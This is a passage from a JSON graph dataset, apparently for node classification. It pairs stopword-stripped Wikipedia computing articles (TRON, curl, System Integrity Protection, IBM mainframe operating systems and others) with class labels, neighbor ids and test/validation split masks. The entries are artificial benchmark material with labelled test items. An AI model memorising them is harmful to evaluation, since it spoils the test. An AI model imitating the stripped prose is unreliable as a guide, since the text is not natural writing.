      603,
      9819,
      2145,
      2146,
      3170,
      5225,
      622,
      9839,
      9328,
      10862,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      636,
      7290,
      9340,
      10879,
      5761,
      5765,
      10886,
      2183,
      8841,
      5259,
      1676,
      653,
      6797,
      7822,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      2221,
      10414,
      3250,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      214,
      9943,
      9434,
      2782,
      2783,
      736,
      4321,
      6370,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      3821,
      8429,
      10991,
      10993,
      242,
      2804,
      3834,
      9978,
      1791,
      8959,
      11519,
      6927,
      3856,
      9491,
      3351,
      5401,
      8473,
      8985,
      8988,
      11546,
      4384,
      5413,
      2854,
      11559,
      5928,
      3881,
      10024,
      10026,
      11570,
      1844,
      9525,
      11572,
      10039,
      6972,
      1856,
      3394,
      1348,
      6984,
      844,
      3922,
      4439,
      5465,
      10079,
      11616,
      3425,
      2402,
      7523,
      7524,
      2919,
      4458,
      6506,
      9066,
      1904,
      9593,
      2943,
      11144,
      9609,
      1418,
      5003,
      5004,
      9612,
      10122,
      8080,
      3481,
      9114,
      11677,
      10654,
      8607,
      929,
      5027,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      460,
      7629,
      3535,
      8659,
      1498,
      4058,
      5594,
      478,
      8161,
      6114,
      6115,
      9196,
      6637,
      4590,
      9709,
      6641,
      3573,
      10229,
      2046,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 10030,
    "label": 2,
    "text": "TRON_project:tron project tron acronym real-time operating system nucleus open architecture real-time operating system kernel design project started prof. dr. ken sakamura university tokyo 1984 project goal create ideal computer architecture network provide society needs industrial tron itron derivative one world used operating systems 2003 present billions electronic devices mobile phones appliances even cars although mainly used japanese companies garnered interest worldwide however dearth quality english documentation said hinder broader adoption tron project integrated t-engine forum 2010 today supported popular ssl/tls libraries wolfssl tron specify source code kernel instead set interfaces design guidelines creating kernel allows different companies create versions tron based specifications suited different microprocessors specification tron publicly available implementations proprietary discretion implementer tron framework defines complete architecture different computing units 1984 tron project officially launched 1985 nec announced first itron implementation based itron/86 specification 1986 tron kyogikai unincorporated tron association established hitachi announced itron implementation based itron/68k specification first tron project symposium held 1987 fujitsu announced itron implementation based itron/mmu specification mitsubishi electric announced itron implementation based itron/32 specification hitachi introduced gmicro/200 32bit microprocessor based tron vlsi cpu specification 2004 governor tokyo shintaro ishihara mentioned tron killed former minister international trade industry hashimoto time pressure united states story supported article website dedicated tron project citing microsoft lobbying result threat super-301 complete stop import based section 301 omnibus trade competitiveness act 1988 everything related tron led many companies dropping tron fear lose possibility export united states tron project administered tron association integrated t-engine forum 2010 tron project activities taken continued t-engine forum t-engine forum non-profit organization develops open specifications itron t-kernel ubiquitous id architecture chair t-engine forum dr. ken sakamura july 2011 266 members t-engine forum executive committee members includes top japanese giants like fujitsu hitachi ntt docomo denso a-level members involved design development specifications t-engine t-kernel ubiquitous id technology include companies esol nec yamaha corporation b-level members involved development product using t-engine specification t-kernel include companies like arm freescale mips technologies mitsubishi robert bosch gmbh sony corporation toshiba xilinx supporting members academic members involved forum include many universities university tokyo japan dalian maritime university china microscript programming language graphically-oriented high-level programming language created personal media corporation tron similar apple computer hypertalk intended mainly end users little programming experience yet also used development tool professional btron programmers port software tron variants easily quickly write device drivers hardware devices microscript based makes extensive use tron basic text editor basic figure editor",
    "neighbors": [
      10883,
      6276,
      4486,
      6419,
      9366,
      7319,
      2201,
      9628,
      8355,
      7983,
      9137,
      6207,
      321,
      10561,
      1221,
      8262,
      9927,
      6985,
      9162,
      9932,
      341,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      10482,
      11383
    ],
    "mask": "Test"
  },
  {
    "node_id": 10031,
    "label": 9,
    "text": "Programming_Computable_Functions:programming computable functions computer science programming computable functions pcf typed functional language introduced gordon plotkin 1977 based previous unpublished material dana scott considered extended version typed lambda calculus simplified version modern typed functional languages ml haskell fully abstract model pcf first given milner 1977 however since milner model essentially based syntax pcf considered less satisfactory ong 1995 first two fully abstract models employing syntax formulated 1990s models based game semantics hyland ong 2000 abramsky jagadeesan malacaria 2000 kripke logical relations o'hearn riecke 1995 time felt neither models completely satisfactory since effectively presentable however ralph loader demonstrated effectively presentable fully abstract model could exist since question program equivalence finitary fragment pcf decidable types pcf inductively defined context list pairs x σ x variable name σ type variable name duplicated one defines typing judgments terms-in-context usual way following syntactical constructs relatively straightforward semantics language scott model model model fully abstract pcf fully abstract language obtained adding parallel operator pcf p. 293 hyland ong 2000 reference",
    "neighbors": [
      512,
      10049,
      6306,
      3876,
      1830,
      11020,
      5585,
      3929
    ],
    "mask": "Test"
  },
  {
    "node_id": 10032,
    "label": 7,
    "text": "SparkleShare:sparkleshare sparkleshare open-source cloud storage file synchronization client app default uses git storage backend sparkleshare comparable dropbox cloud storage provided user server hosted solution github advantage self-hosting user retains absolute control data simplest case self-hosting requires ssh git sparkleshare support android ios devices hold due lack developer resources",
    "neighbors": [
      6565,
      10341,
      4490,
      7983,
      4623,
      11221,
      823,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 10033,
    "label": 8,
    "text": "CURL:curl curl pronounced 'curl computer software project providing library libcurl command-line tool curl transferring data using various protocols first released 1997 name stands client url original author lead developer swedish developer daniel stenberg libcurl free client-side url transfer library supporting cookies dict ftp ftps gopher http/1 http/2 support http post http put http proxy tunneling https imap kerberos ldap pop3 rtsp scp smtp library supports file uri scheme sftp telnet tftp file transfer resume ftp uploading http form-based upload https certificates ldaps proxies user-plus-password authentication libcurl library portable builds works identically many platforms including aix amigaos android beos blackberry tablet os blackberry 10 openvms darwin dos freebsd hp-ux hurd ios irix linux macos netbsd netware openbsd os/2 qnx neutrino risc os solaris symbian tru64 ultrix unixware microsoft windows libcurl library free thread-safe ipv6 compatible bindings available 40 languages including c/c++ java php python libcurl library support axtls gnutls mbed tls nss qsossl ibm schannel windows secure transport macos ios ssl/tls openssl wolfssl curl command-line tool getting sending data including files using url syntax since curl uses libcurl supports range common network protocols currently including http https ftp ftps scp sftp tftp ldap dap dict telnet file imap pop3 smtp rtsp last four versions newer 7.20.0 9 february 2010 curl supports https performs ssl certificate verification default secure protocol specified https curl connects remote server via https obtain remote server certificate check ca certificate store validity remote server ensure remote server one claims curl packages bundled ca certificate store file several options specify ca certificate -- cacert -- capath -- cacert option used specify location ca certificate store file windows platform ca certificate file specified curl look ca certificate file name “ curl-ca-bundle.crt ” following order curl return error message remote server using self-signed certificate remote server certificate signed ca listed ca cert file -k -- insecure option used skip certificate verification alternatively remote server trusted remote server ca certificate added ca certificate store file basic use curl involves simply typing curl command line followed url output retrieve curl defaults displaying output retrieves standard output specified system usually terminal window running command would systems display www.example.com source-code terminal window -o flag used store output file instead options change tool behavior available",
    "neighbors": [
      517,
      2568,
      6674,
      8729,
      2083,
      5670,
      10791,
      5677,
      9780,
      64,
      9281,
      4174,
      9839,
      1647,
      113,
      8834,
      6281,
      6797,
      4248,
      3744,
      4771,
      9380,
      7847,
      9909,
      7356,
      4797,
      10428,
      7364,
      1741,
      1750,
      9946,
      4850,
      7411,
      2804,
      11509,
      6396,
      5380,
      9997,
      3856,
      5397,
      1304,
      808,
      7982,
      7983,
      823,
      5437,
      7486,
      8517,
      7515,
      5470,
      11112,
      6506,
      8554,
      3442,
      2432,
      2945,
      3970,
      10631,
      4490,
      3487,
      4001,
      11693,
      7088,
      1978,
      960,
      8644,
      6098,
      11221,
      10727,
      9709,
      7663,
      4592,
      2545,
      11249,
      10739,
      8692,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10034,
    "label": 4,
    "text": "Domain_Based_Security:domain based security domain based security abbreviated dbsy model-based approach help analyse information security risks business context provide clear direct mapping risks security controls needed manage variant approach used uk government hmg infosec standard no.1 technical risk-assessment method dbsy registered trade mark qinetiq ltd. dbsy developed late 1990s defence evaluation research agency dera model-based approach information assurance describes requirements security organisation taking account business needs supported model based around concept security domain represents logical place people work information using computer system connections security domains necessary support business activity hence focus information needs protection people work people exchange information model also describe physical environments people work system boundaries major system security measures placed systematic method applied model identify describe risks valuable information assets exposed specify security measures effective managing risks dbsy origins late 1990s developed defence evaluation research agency dera ministry defence mod initially called domain based approach developed alongside purple penelope support mod increasing need interconnections systems operating different security levels recognised risks associated connections directly related nature information exchange needed effective model understanding managing risks would need take account business needs information sharing also recognised controlled release information system handling secret information sometimes referred time 'down grading 'sanitisation adequately described existing models information security notably bell-lapadula biba associated information flow models information flow models found unhelpful understanding risks information shared people systems entirely trusted effective model understanding managing risks would need take account business needs exchanging information within outside organisation modelling technique applied major projects mod result experience graphical modelling techniques revised rigorous risk assessment method based concepts compromise paths developed approach security documentation project lifecycle also created domain based security conferences held qinetiq malvern june 2005 june 2006 promoting discussion could widely used defence commercial systems variant dbsy method subsequently developed incorporated uk government hmg infosec standard no.1 technical risk assessment method standard method used security risk assessments government information technology systems dbsy approach uses simple models represent requirements security organisation using two different related viewpoints infosec business model represents security aspects business infosec infrastructure model represents logical provision strong boundaries enforce separation combined make infosec architecture model model forms basis conducting systematic rigorous risk assessment infosec business model defines security domains connections model specifies limits information processed exchanged security domains forms set security requirements business particular connections explicitly modelled permitted required occur security domain characterised set information assets may valuable organisation well people work information applications services act behalf connections domains characterised nature interaction required interpersonal messages shared access database sensitivity integrity requirements information exchange model also represent kinds physical environment domain accessed infosec infrastructure model defines islands computing infrastructure required logically separate information exchanged except identifiable manageable points connection referred causeways island characterised strength separation islands people manage computing infrastructure infosec architecture model combines business infrastructure views showing security domains supported islands infrastructure connections security domains hosted different islands connections must supported appropriate causeway dbsy method uses rational risk framework describing risks information assets exposed similar kinds assets grouped together focus interest risk assessment process applied focus interest turn key factors determining risk particular focus interest risk framework applied systematic fashion organisation-specific infosec architecture model representing security-relevant features organisation business systems process set compromise paths systematically described relative effectiveness different countermeasures assessed dbsy differs risk management methods primary focus people business drivers organisation way business works rather technical security measures analyst required systematically define groups people pose threat ways might cause harm providing rigorous business-oriented framework concepts threat vulnerability aim understand analyse information security risks faced organisation especially risks appear conflict needs business efficiency across organisation dealings customers business partners",
    "neighbors": [
      3360,
      612,
      5636,
      11172,
      7979,
      11567,
      11695,
      8881,
      4404,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 10035,
    "label": 5,
    "text": "Venturi_Transport_Protocol:venturi transport protocol venturi transport protocol vtp patented proprietary transport layer protocol designed transparently replace tcp order overcome inefficiencies design tcp related wireless data transport owned venturi wireless protocol employed various wireless broadband internet service providers verizon wireless unwired unwired calls venturi client application provides transparent vtp connectivity unwired optimizer order speed network overcome latency issues",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10036,
    "label": 2,
    "text": "System_Integrity_Protection:system integrity protection system integrity protection sip sometimes referred rootless security feature apple macos operating system introduced os x el capitan comprises number mechanisms enforced kernel centerpiece protection system-owned files directories modifications processes without specific entitlement even executed root user user root privileges sudo apple says root user significant risk factor system security especially systems single user account user also administrator system integrity protection enabled default disabled apple says system integrity protection necessary step ensure high level security one wwdc developer sessions apple engineer pierre-olivier martel described unrestricted root access one remaining weaknesses system saying piece malware one password vulnerability away taking full control device stated installations macos one user account necessarily carries administrative credentials means users grant root access program asks whenever user system prompted enters account password – martel says often weak non-existent – security entire system potentially compromised restricting power root unprecedented macos instance versions macos prior mac os x leopard enforce securelevel security feature originates bsd derivatives upon macos partially based system integrity protection comprises following mechanisms system integrity protection protects system files directories flagged protection happens either adding extended file attribute file directory adding file directory among protected directories symbolic links also protected although target directories protected preinstalled apple applications protected well kernel stops processes without specific entitlements modifying permissions contents flagged files directories also prevents code injection runtime attachment dtrace respect protected executables since os x yosemite kernel extensions drivers code-signed particular apple entitlement developers request developer id entitlement apple kernel refuses boot unsigned extensions present showing user prohibition sign instead mechanism called kext signing integrated system integrity protection system integrity protection disabled either wholly partly outside system partition end apple provides command-line utility executed terminal window within recovery system bootable macos installation disk adds boot argument device nvram applies setting installations el capitan macos sierra device upon installation macos installer moves unknown components within flagged system directories preventing write access system directories system file directory permissions maintained automatically apple software updates result permissions repair available disk utility corresponding operation reception system integrity protection mixed macworld expressed concern apple could take full control away users developers future releases move security policy macos slowly toward apple mobile operating system ios whereupon installation many utilities modifications requires jailbreaking applications drivers work full extent operated unless feature disabled either temporarily permanently ars technica suggested could affect smaller developers disproportionately larger ones may able work apple directly however also remarked far users including power users reason turn feature saying almost downsides",
    "neighbors": [
      5636,
      4615,
      5647,
      1042,
      537,
      5158,
      6700,
      4657,
      1074,
      9802,
      10318,
      5713,
      3670,
      4184,
      2141,
      4702,
      2149,
      8303,
      6771,
      2676,
      6264,
      9343,
      3719,
      5256,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      5280,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      2259,
      9430,
      3289,
      4318,
      231,
      9451,
      2288,
      11506,
      7928,
      8441,
      8954,
      2811,
      7422,
      11521,
      2819,
      1796,
      10512,
      4888,
      11037,
      811,
      3371,
      7983,
      9529,
      11584,
      4933,
      9035,
      1878,
      5465,
      4957,
      4457,
      9100,
      9109,
      1439,
      4532,
      9151,
      6093,
      7118,
      3035,
      4571,
      6625,
      4068,
      1509,
      5093,
      487,
      10221,
      7663,
      5619,
      11257,
      7163,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10037,
    "label": 2,
    "text": "APUS_Group:apus group apus group commonly termed apus founded june 2014 tao li chinese technology company specializing android development information services company main product apus user system also known apus launcher drawn 1 billion users globally 2016 along apus series products including apus user system apus booster+ apus browser apus message center apus flashlight etc covering 200 countries six continents according tao li ceo apus 90 percent users countries beyond china one world top 10 developers mobile applications name apus short perfect user system also refers bird species apodidae swift highly aerial bird family fastest fliers animal kingdom maximum speed june 2014 tao li founded apus group beijing month apus netted 100 million rmb series funding july 2 2014 apus launcher released google play 28 days later apus user group reached 10 million october 22 2014 apus announced 50 million user globally december 1 2014 apus published first apus global mobile application analysis report january 2015 apus picked 100 million usd series b funding become youngest unicorn companies market values usd 1 billion world january 2015 apus user group reached 100 million march 2015 apus user group reached 150 million named fifth developer world app annie may 2015 apus user group reached 300 million may 2015 apus browser released september 2015 apus announced ’ netted 250 million users globally apus user system apus launcher 510 million apus user system apus launcher apus series products time market value reached usd 1.5 billion september 2015 apus announced long-term partnership inmobi decision entry india market october 2015 apus announced entry japanese korean market december 2015 apus announced usd 45 million rs 300 crore indian mobile web companies march 2016 apus announced acquired 920 million downloads apus series products including apus user system apus booster apus browser apus browser turbo apus flashlight etc october 2016 forbes reported leading position apus group google play store praised apus group advanced business model successful monetization november 2016 apus announced fresh investment us 44 million india new research development center sales business development office gurgaon startup incubator",
    "neighbors": [
      4685
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10038,
    "label": 7,
    "text": "IEEE_Cloud_Computing:ieee cloud computing ieee cloud computing global initiative launched ieee promote cloud computing big data related technologies provide expertise resources individuals enterprises involved cloud computing 2010 institute electrical electronics engineers ieee sponsored two cloud computing–specific conferences ieee cloud ieee cloudcom success two conferences ieee senior member ieee computer society past president steve diamond began urging organization take active role development cloud computing standards april 2011 support ieee future directions committee funding ieee new initiatives committee ieee cloud computing launched initiative designed follow multi-year plan includes focus across multiple tracks conferences education publications standards intercloud testbed web portal marketing public relations part initiative launch two new cloud computing standards development projects approved ieee p2301 draft guide cloud portability interoperability profile ieee p2302 draft standard intercloud interoperability federation siif growing need greater cloud computing interoperability federation ieee cloud computing focused development activities resources behind ieee p2302 standard ieee cloud computing continues pursue efforts provide cloud computing standards advancement cloud computing technologies educate users benefits cloud computing part ongoing effort offers variety activities products services including ieee cloud computing portal conferences events continuing education courses publications standards ieee intercloud testbed platform testing cloud computing interoperability ieee cloud computing portal serves online hub cloud computing resources site includes news information form ieee press releases well articles taken ieee third-party publications portal provides dedicated sections conferences events education careers publications standards ieee intercloud testbed innovations part mandate ieee cloud computing process developing global cloud computing standards april 2011 began working first ieee cloud computing standards ieee p2301 ieee p2302 ieee p2301 draft guide cloud portability interoperability profile ieee p2302 draft standard intercloud interoperability federation address cloud interoperability portability fragmentation ieee p2301 guide cloud portability interoperability profiles cpip working group formed february 24 2014 mandate develop guide cloud portability interoperability profiles completed guide advise cloud computing ecosystem participants cloud vendors service providers end users available standards-based choices areas like application portability management interoperability interfaces file formats operation conventions guide group choices multiple logical profiles organized address different cloud personalities john messina senior member national institute standards technology nist cloud computing program chair ieee p2301 guide cloud portability interoperability profiles working group april 4 2011 ieee p2302 draft standard intercloud interoperability federation working group formed finalized approved ieee p2302 define topology protocols functionality governance cloud-to-cloud interoperability federated operations ieee cloud computing also formed new ieee adaptive management cloud computing amcc study group december 16 2013 group purpose investigate management environments needed support dynamic nature cloud computing environments services provide customers consume services providers offering services also explore potential application adaptive policy-based management cloud based environments including adaptive management architectures environments adaptive security management auto-generation management policies business specifications auto-generation data support management functionality co-generation application management functionality joel fleck senior standards architect hp labs study group chair ieee cloud computing sponsors participates cloud computing-focused conferences events around world designed promote knowledge-sharing cloud computing events typically range one day week attract global audience conference event programs generally offer multiple educational tracks keynote speeches panel discussions roundtables led industry notables researchers engineers academics policymakers key stakeholders early january 2012 ieee cloud computing began partnering established conference develop matrix events targeted specific geographic regions ieee globecom 2013 held atlanta georgia co-located north america cloud congress initiative organizing additional cloud congresses european asia pacific latin america regions encourage greater focus cloud computing via existing well-established conference ieee signature conference computers software applications compsac ieee international conference cloud computing technology science ieee cloudcom ieee global communications conference exhibition industry forum globecom create new cloud computing-related events specific geographic regions ieee cloud computing offers continuing education courses e-learning modules videos conference section chapter talks participating societies organizations active ieee cloud computing include",
    "neighbors": [
      4194,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 10039,
    "label": 2,
    "text": "Windows_Hardware_Error_Architecture:windows hardware error architecture windows hardware error architecture whea operating system hardware error handling mechanism introduced windows vista windows server 2008 successor machine check architecture mca previous versions windows architecture consists several software components interact hardware firmware given platform handle notify regarding hardware error conditions collectively components provide generic means discovering errors common error report format errors way preserving error records error event model based event tracing windows etw whea builds pci express advanced reporting provide detailed information system errors common reporting structure whea allows third-party software interact operating system react certain hardware events example new cpu added running system—a windows server feature known dynamic hardware partitioning—the hardware error component stack notified new processor installed unknown hardware errors windows 10 solved reverse engineering running scf scan",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      2847,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      1844,
      9525,
      11572,
      6972,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 10040,
    "label": 2,
    "text": "History_of_IBM_mainframe_operating_systems:history ibm mainframe operating systems history operating systems running ibm mainframes notable chapter history mainframe operating systems ibm long-standing position world largest hardware supplier mainframe computers arguably operating systems ibm supplied customers use early mainframes seldom innovative except virtual machine systems beginning cp-67 company well-known reputation preferring proven technology generally given potential users confidence adopt new ibm systems fairly quickly ibm current mainframe operating systems z/os z/vm z/vse z/tpf backward compatible successors operating systems introduced 1960s although course improved many ways ibm-supplied operating systems supplied others discussed notably used ibm mainframes ibm slow introduce operating systems general motors produced general motors os 1955 gm-naa i/o 1956 use ibm computers 1962 burroughs corporation released mcp general electric introduced gecos cases use customers fact first operating systems ibm computers written ibm customers wish expensive machines us 2m mid-1950s sitting idle operators set jobs manually wanted mechanism maintaining queue jobs operating systems described ran processor models suitable scientific engineering calculations users ibm computers applications manage without operating systems one ibm smaller computers ibm 650 introduced feature later became part os/360 processing interrupted random processing error hardware glitch machine could automatically resume last checkpoint instead requiring operators restart job manually beginning general motors research division produced gm-naa i/o ibm 701 1956 prototype gm operating system developed 1955 updated 701 successor 1960 ibm user association share took produced updated version share operating system finally ibm took project supplied enhanced version called ibsys ibm 7090 ibm 7094 computers ibsys required 8 tape drives fewer system one disk drives main components card-based job control language main user interface compilers fortran cobol assembler various utilities including sort program 1958 university michigan executive system adapted gm-naa i/o produce umes better-suited large number small jobs created students umes used 1967 replaced mts timesharing system bell labs produced besys sometimes referred bellmon used mid-1960s bell also made available others without charge formal technical support ibsys ibm produced ibm 709 7090 7094 computers tape-based operating system whose sole purpose compile fortran programs—in fact fms fortran compiler tape mit fernando corbató produced first experimental time-sharing systems ctss 1957 early 1960s using slightly modified ibm 704 ibm 7090 mainframes systems based proposal john mccarthy 1960s ibm laboratories created experimental time-sharing systems using standard mainframes hardware microcode modifications support virtual memory ibm m44/44x early 1960s cp-40 1964 1967 cp-67 1967 1972 company even released cp-67 without warranty technical support several large customers 1968 1972 cp-40 cp-67 used modified system/360 cpus m44/44x based ibm 7044 earlier generation cpu different internally experimental systems late incorporated system/360 series ibm announced 1964 encouraged company add virtual memory virtual machine capabilities system/370 mainframes operating systems 1972 1968 consulting firm called computer software systems used released version cp-67 set commercial time-sharing service company technical team included 2 recruits mit see ctss dick orenstein harold feinleib grew company renamed national css modified software increase number paying users could support system sufficiently different warranted new name vp/css vp/css delivery mechanism national css services early 1980s switched ibm vm/370 see universities produced three s/360 time-sharing operating systems late 1960s early 1960s ibm low-end high-end systems incompatible programs could easily transferred one another systems often used completely different peripherals e.g disk drives ibm concluded factors increasing design production costs hardware software level unsustainable reducing sales deterring customers upgrading 1964 company announced system/360 new range computers used peripherals could run programs ibm originally intended system/360 one batch-oriented operating system os/360 least two accounts ibm later decided also produce simpler batch-oriented operating system dos/360 system/360 operating systems complex previous ibm operating systems several reasons including made development os/360 system/360 software one largest software projects anyone attempted ibm soon ran trouble huge time cost overruns large numbers bugs problems magnified develop test system/360 operating systems real hardware ibm first develop basic programming support bps bps used develop tools needed develop dos/360 os/360 well first versions tools would supply operating systems compilers fortran cobol utilities including sort assembler needed build software ibm competitors took advantage delays os/360 system/360 announce systems aimed thought vulnerable parts ibm market prevent sales system/360 collapsing ibm released four stop-gap operating systems ibm announced s/360-67 also announced timesharing operating system tss/360 would use new virtual memory capabilities 360/67 tss/360 late unreliable ibm canceled time alternative operating system cp-67 developed ibm cambridge scientific center running well enough ibm offer without warranty timesharing facility large customers cp-67 would go become vm/370 eventually z/vm traumas producing system/360 operating systems gave boost emerging discipline software engineering attempt apply scientific principles development software management software projects frederick p. brooks senior project manager whole system/360 project given specific responsibility os/360 already long overdue wrote acclaimed book mythical man-month based problems encountered lessons learned project two os/360 preferred operating system higher-end system/360 machines dos/360 usual operating system less powerful machines provided set utility programs macro assembler compilers fortran cobol support rpg came later eventually pl/i subset supported useful range file organizations access methods help using sequential isam files could store either fixed-length variable-length records types could occupy one disk volume dos/360 also offered btam data communications facility primitive hard use today standards btam could communicate almost type terminal big advantage time hardly standardization communications protocols dos/360 significant limitations compared os/360 used control larger system/360 machines ibm expected dos/360 users would soon upgrade os/360 despite limitations dos/360 became world widely used operating system dos/360 ran well system/360 processors medium-sized organizations could afford better operating systems customers result descendant z/vse still widely used today 2005 os/360 included multiple levels support single api much shared code pcp stop-gap version could run one program time mft multiprogramming fixed number tasks mvt multiprogramming variable number tasks used least late 1970s good five years successors launched unclear whether divisions among pcp mft mvt arose mvt required much memory usable mid-range machines ibm needed release multiprogramming version os mft soon possible pcp mft mvt different approaches managing memory see provided similar facilities experience indicated advisable install os/360 systems less 256 kb memory common limitation 1960s installing mft customers would specify five partitions areas memory fixed boundaries application programs could run simultaneously mft version ii mft-ii raised limit 52 mvt considerably larger complex mft therefore used powerful system/360 cpus treated memory used operating system single pool contiguous regions could allocated required indefinite number simultaneous application programs scheme flexible mft principle used memory efficiently liable fragmentation one could find although enough spare memory total run program divided separate chunks none large enough 1971 time sharing option tso use mvt added tso became widely used program development provided editor ability submit batch jobs notified completion view results without waiting printed reports debuggers programming languages used system/360 tso communicated terminals using tcam telecommunications access method eventually replaced earlier queued telecommunications access method qtam tcam name suggests ibm hoped would become standard access method data communications fact tcam used almost entirely tso largely superseded vtam late 1970s onwards system/360 hardware operating systems designed processing batch jobs extreme cases might run hours result unsuitable transaction processing thousands units work per day takes 30 seconds minutes 1968 ibm released ims handle transaction processing 1969 released cics simpler transaction processing system group ibm staff developed customer ims available os/360 successors cics also available dos/360 successors many years type product known tp teleprocessing monitor strictly speaking tp monitors operating system components application programs managed application programs 1970s 1980s several third-party tp monitors competed cics notably taskmaster shadow intercomm ibm gradually improved cics point customers abandoned alternatives 1950s airlines expanding rapidly growth held back difficulty handling thousands bookings manually using card files 1957 ibm signed development contract american airlines development computerized reservations system became known sabre first experimental system went live 1960 system took booking functions 1964 cases using ibm 7090 mainframes early 1960s ibm undertook similar projects airlines soon decided produce single standard booking system pars run system/360 computers sabre early versions pars separation application operating system components software 1968 ibm divided pars application acp operating system later versions acp named acp tpf tpf transaction processing facility non-airline businesses adopted operating system handling large volumes online transactions latest version z/tpf ibm developed acp successors mid-1960s ibm standard operating systems dos/360 os/360 batch-oriented could handle large numbers short transactions quickly enough even transaction monitors ims cics run control standard general-purpose operating systems fast enough handling reservations hundreds flights thousands travel agents last public domain version acp hence last free version acp 9.2 distributed single mini-reel accompanying manual set two dozen manuals occupied perhaps 48 lineal inches shelf space could restored ibm 3340 disk drives would thereby provide fully functional acp system acp 9.2 intended primarily bank card mastercard et al financial applications could also utilized airlines reservation systems time acp become general-purpose os indeed acp incorporated hypervisor module chyr supported virtual os ... usually vs1 possibly also vs2 ... guest program development file maintenance could accomplished concurrently on-line functions instances production work run vs2 hypervisor including possibly ims db model 20 labeled part system/360 range could connected peripherals 16-bit machine entirely program-compatible members system/360 range three operating systems developed ibm labs germany different 360/20 configurations dps—with disks minimum memory required 12 kb tps—no disk tapes minimum memory required 8 kb cps—punched-card-based minimum memory required 4 kb direct successors since ibm introduced system/3 range small business computers 1969 system/3 different internal design 360/20 different peripherals ibm mainframes another processor used system/360 peripherals different internal design 360/44 designed scientific computation using floating point numbers geological meteorological analyses internal differences specialized type work designed 360/44 operating system ps/44 emulator missing system/360 instructions allowed model 44 run os/360 360/44 ps/44 direct successors system/370 announced 1970 offered essentially facilities system/360 4 times processor speeds similarly-priced system/360 cpus 1972 ibm announced system/370 advanced functions main item future sales system/370 would include virtual memory capability could also retro-fitted existing system/370 cpus hence ibm also committed delivering enhanced operating systems could support use virtual memory new operating systems distinguished predecessors presence /vs names vs stands virtual storage ibm avoided term virtual memory allegedly word memory might interpreted imply ibm computers could forget things today ibm mainframe operating systems except z/tpf descendants included system/370 advanced functions announcement z/tpf descendant acp system ibm initially developed support high-volume airline reservations applications dos/vs successor dos/360 addition virtual memory dos/vs provided enhancements dos/vs followed significant upgrades dos/vse vse/sp 1980s vse/esa 1991 z/vse 2005 os/vs1 successor mft offered similar facilities addition virtual memory ibm released fairly minor enhancements os/vs1 1983 1984 announced would os/vs1 tss/370 ibm system/370 operating systems modern descendants special real time operating system srtos programming rpq z06751 variant os/vs1 extended support real-time computing targeted industries electric utility energy management oil refinery applications os/vs2 release 1 svs replacement mvt virtual memory many changes retained overall structure 1974 ibm released described os/vs2 release 2 major rewrite upwards-compatible earlier os/vs2 svs new system noticeable feature supported multiple virtual address spaces different applications thought using range virtual addresses new system virtual memory facilities mapped different ranges real memory addresses result new system rapidly became known mvs multiple virtual storages original os/vs2 became known svs single virtual storage ibm accepted terminology labelled mvs successors mvs/ ... distinctive features mvs main catalog vsam catalog supported tightly-coupled multiprocessing 2 cpus share memory copy operating system included system resources manager renamed workload manager later versions allowed users load additional work system without reducing performance high-priority jobs ibm released several mvs upgrades mvs/se mvs/sp version 1 mvs/xa 1981 mvs/esa 1985 os/390 1996 currently z/os 2001 vm/370 combined virtual machine facility single-user system called conversational monitor system cms combination provided time-sharing allowing user run copy cms virtual machine combination direct descendant cp/cms virtual machine facility often used testing new software normal production work continued another virtual machine cms timesharing system widely used program development vm/370 followed series upgrades vm/sepp systems extensions program product vm/bsepp basic systems extensions program product vm/sp system product vm/sp hpo high performance option vm/xa extended architecture migration aid vm/xa sf extended architecture system facility vm/xa sp extended architecture system product vm/esa enterprise systems architecture z/vm ibm also produced optional microcode assists vm successors speed hypervisor emulation privileged instructions operating systems use behalf guest operating systems part 370/extended architecture ibm added start interpretive execution sie instruction allow speedup 